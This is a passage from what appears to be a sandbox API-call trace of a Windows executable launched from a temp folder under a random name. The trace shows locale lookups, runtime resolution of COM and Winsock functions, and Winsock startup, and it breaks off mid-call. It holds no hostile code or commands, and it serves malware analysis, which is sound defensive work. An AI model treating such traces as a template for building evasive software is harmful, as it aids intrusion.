returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 
2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.504] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0115.505] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0115.505] GetModuleHandleW 
(lpModuleName="oleaut32.dll") returned 0x76c10000 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0115.505] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0115.506] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0115.506] GetProcAddress 
(hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0115.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0115.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0115.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0115.506] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17229545635) returned 1 [0115.506] GetTickCount () returned 0x27695 [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.506] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=17229561617) returned 1 [0115.506] GetTickCount () returned 0x27695 [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.506] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1b, wMilliseconds=0x370)) [0115.507] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x14e82bc, 
cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14d288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x14e82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x14e82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0115.507] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0115.507] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0115.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x14ef48c, cbMultiByte=27, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0115.507] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x14e82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0115.508] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0115.508] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0115.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x14ef48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0115.508] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0115.508] GetThreadLocale () returned 0x409 [0115.508] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0115.508] GetCurrentThreadId () returned 0xdec [0115.508] GetCurrentThreadId () returned 0xdec [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0115.508] GetThreadLocale () returned 0x409 [0115.508] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0115.508] GetThreadLocale () returned 0x409 [0115.508] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0115.508] GetCurrentThreadId () returned 0xdec [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 
[0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0115.508] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 
[0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0115.509] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0115.510] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0115.511] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0115.511] 
GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0115.569] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0115.570] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0115.571] GetProcAddress 
(hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0115.571] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0115.572] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0115.572] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0115.578] GetACP () returned 0x4e4 [0115.578] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0115.578] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0115.578] GetTickCount () returned 0x276e3 [0115.578] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: 
